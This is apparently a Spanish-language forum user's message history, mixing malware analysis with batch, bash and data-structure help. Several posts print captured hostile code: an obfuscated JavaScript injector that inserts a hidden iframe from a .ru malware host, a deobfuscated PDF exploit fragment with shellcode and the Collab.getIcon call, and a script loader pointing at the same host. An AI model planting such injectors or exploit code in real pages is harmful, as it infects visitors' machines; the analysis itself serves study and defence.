Mensajes

[Referer:]

He mirado un poco más la parte de la web. La página en cuestión solo se muestra si existe la cabecera Referer:, y contiene el siguiente script:

Código (javascript) [Seleccionar] Expandir

try{

F53981243 = document.referrer;
Nsrd2unvt = '';
Tfym92yesygh = 'ES';
function Cr8z7f2tf8(V8vurp6x9cfrz){
  if (F53981243.indexOf(V8vurp6x9cfrz) != -1){
    Nsrd2unvt=V8vurp6x9cfrz;
   }
}
Cr8z7f2tf8('g*o7o]gXl*e7.Xr6u*'.replace(/[\*67X\]]/g, ''));
Cr8z7f2tf8('m2aDi#l2.2rDu2'.replace(/[2D#\|X]/g, ''));
Cr8z7f2tf8('y{ain)d{e)xT.CriuT'.replace(/[T\{C\)i]/g, ''));
Cr8z7f2tf8('rpaBmpb~lBepro.prou('.replace(/[\(~pBo]/g, ''));

if (Nsrd2unvt && Tfym92yesygh == 'RU'){
    window.location= 'hPtPtxpx:~/P/AleiegAhAtA.Ak~aetPaelPo~g~-edPoeseuxgxaA.Ar~ue/A?~sPtPixde=P8A8x&ArAiPdx=~2e5x5~6x'.replace(/[x~ePA]/g, '');
}else{
    Athvzpwjthi8chwh = 'http://gothguilt.ru:8080/index.php?pid=1&home=1';
    F7ipjzz32gtxvlp7amy = 24-(12*2);
    var D6ouc495shy0 = document.createElement('div');
    D6ouc495shy0.id = 'G6i85jq19fd';
    document.body.appendChild(D6ouc495shy0);
    Pygxn4t7yxe6p = 'F7ipjzz32gtxvlp7amy';
    F15fy37lsuro9 = document.createElement('i$^f@&r((^a&@$!m)$e)$(&'.replace(/\)|\$|@|\^|#|&|\!|\(/ig, ''));
    F15fy37lsuro9.src = Athvzpwjthi8chwh;
    F15fy37lsuro9.height = F7ipjzz32gtxvlp7amy;
    F15fy37lsuro9.width = F7ipjzz32gtxvlp7amy;
    document.getElementById('G6i85jq19fd').appendChild(F15fy37lsuro9);
}
}catch(e){}


Si lo limpiamos un poco, vemos que comprueba el Referrer, y en caso de que contenga 'RU' nos redireccionará a una página de rusas...xD
Sino crea un div y mete un iframe de 'http://gothguilt.ru:8080/index.php?pid=1&home=1'. Es el mismo malware que se usa en todas las páginas que he visto: la misma ofuscación, mismas comprobaciones, y al final solo dejan un iframe metido para ejecutar los comandos que quieran en la víctima que visite la página infectada...

Lo curioso es que me ha mostrado el script la primera vez, y ahora lo estoy tratando de recuperar y no puedo.

En cualquier caso la moraleja es clara: navega con proxy ruso, menos malware y más teta.

Aquí he hecho algo en batch... =)

Código (dos) [Seleccionar] Expandir

@echo off
setlocal ENABLEDELAYEDEXPANSION

set /p file="Archivo: "
set /a i=0
set /a r=0

for /f "tokens=1,2,3" %%a in (!file!) do (
   call :asig %%~b
   for /l %%x in (1;1;!i!) do (     
      call :comp %%x
   )
   if !r! EQU 0 echo %%a %%b %%c
   set /a r=0
)
goto:eof

:asig
set /a i+=1
set array%i%=%1
goto:eof

:comp
if not %1 EQU %i% (
   if !array%1! EQU !array%i%! set /a r=1
)
goto:eof

Seguro que es mejorable, pero funciona...

Código [Seleccionar] Expandir

echo 8====D | bianc4

Código desofuscado:

Código (javascript) [Seleccionar] Expandir

s = String(" 10! 118! 97! 114! 32! 97! 114! 114! 121! 32! 61! 32! 110! 101! 119! 32! 65! 114! 114! 97! 121! 40! 41! 59! 10! 102! 117! 110! 99! 116! 105! 111! 110! 32! 102! 105! 120! 95! 105! 116! 40! 121! 97! 114! 115! 112! 44! 32! 108! 101! 110! 114! 110! 32! 121! 97! 114! 115! 112! 59! 32! 10! 125! 10! 118! 97! 114! 32! 118! 101! 114! 115! 105! 111! 110! 32! 61! 32! 97! 112! 112! 46! 118! 105! 101! 119! 101! 114! 86! 101! 114! 115! 105! 111! 110! 59! 10! 105! 102! 32! 40! 118! 101! 114! 115! 105! 111! 110! 32! 62! 32! 56! 41! 32! 10! 123! 10! 118! 97! 114! 32! 112! 97! 121! 108! 111! 97! 100! 32! 61! 32! 117! 110! 101! 115! 99! 97! 112! 101! 40! 34! 37! 117! 65! 49! 54! 52! 37! 117! 48! 48! 49! 56! 37! 117! 48! 48! 48! 48! 37! 117! 52! 48! 56! 66! 37! 117! 56! 66! 51! 48! 37! 117! 53! 52! 52! 10! 32! 97! 112! 112! 46! 100! 111! 99! 46! 67! 111! 108! 108! 97! 98! 46! 103! 101! 116! 73! 99! 111! 110! 40! 116! 85! 77! 104! 78! 98! 71! 119! 41! 59! 10! 125! 10! 125! 10").split("! ");
p = '';

for(i=0;i<s.length;i++){
p+=String.fromCharCode(s[i]);
}

Al ejecutarlo nos da un 'eval(p)', siendo 'p':

Código (javascript) [Seleccionar] Expandir

var arry = new Array();
function fix_it(yarsp, lenrn yarsp;
}
var version = app.viewerVersion;
if (version > 8)
{
var payload = unescape("%uA164%u0018%u0000%u408B%u8B30%u544
app.doc.Collab.getIcon(tUMhNbGw);
}
}


Y no puedo decir mucho menos... :S

Código (javascript) [Seleccionar] Expandir

function G(){
_l=document.createElement("script");
_l["defer"]="1";
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
document.body["appendChild"](_l);
};

Ese es el script desofuscado...

Código (bash) [Seleccionar] Expandir

num_carac=`echo $1 | wc -c`

Ten en cuenta que te contará el salto de linea, así que resta uno.

Dale!

Ya lo he modificado y he añadido el bucle que recorre el directorio:

Código (dos) [Seleccionar] Expandir

@echo off
setlocal enabledelayedexpansion

:main
set /p "dir=Directorio: "
for /f %%x in ('dir /b %dir%') do (call :fichero !dir! %%x)
goto:eof

:fichero
set "file=%1\%2"
for /f "tokens=*" %%_ in (%file%) do (
   ((echo %%_ | find "puerta" > nul) || (echo %%_ | find "frente" > nul)) && (call :linea "%%_") || (echo %%_ >> tmp.txt)
)
copy tmp.txt !file! > nul
echo  !file! hecho
del tmp.txt
goto:eof

:linea
for /f "delims=; tokens=1-6*" %%a in (%1) do (
   set "num=%%f" & set "num=!num:~0,-1!"
   set /a num-=1
   echo %%a;%%b;%%c;%%d;%%e;!num!.;%%g; >> tmp.txt
)
goto:eof

Al final he copiado el "num=!num:~0,-1!" de Leo, en lugar de "num=!num:.=!". Aunque funciona igual...

Yo le pediría su twitter...

Pues me acabo de levantar, pero de situaciones reales representables gráficamente con un árbol binario... Se me ocurre:

- Eliminatorias torneo CoreWar (o cualquier competición)

Y ya por el momento nadas más...xD Además, para el árbol genealógico necesitarías un arbol n-ario.

Y por si acaso, te comento. Hay que pensar en un árbol binario (AVL) como una estructura de datos que nos permite realizar búsquedas con un coste logarítmico. La representación real de los datos no tiene que estar relacionado con como la tratemos nosotros... Podrías hacer, por ejemplo, una agenda de contactos dinámica y utilizar un AVL para hacerla más eficiente que una simple lista enlazada.

Un saludo.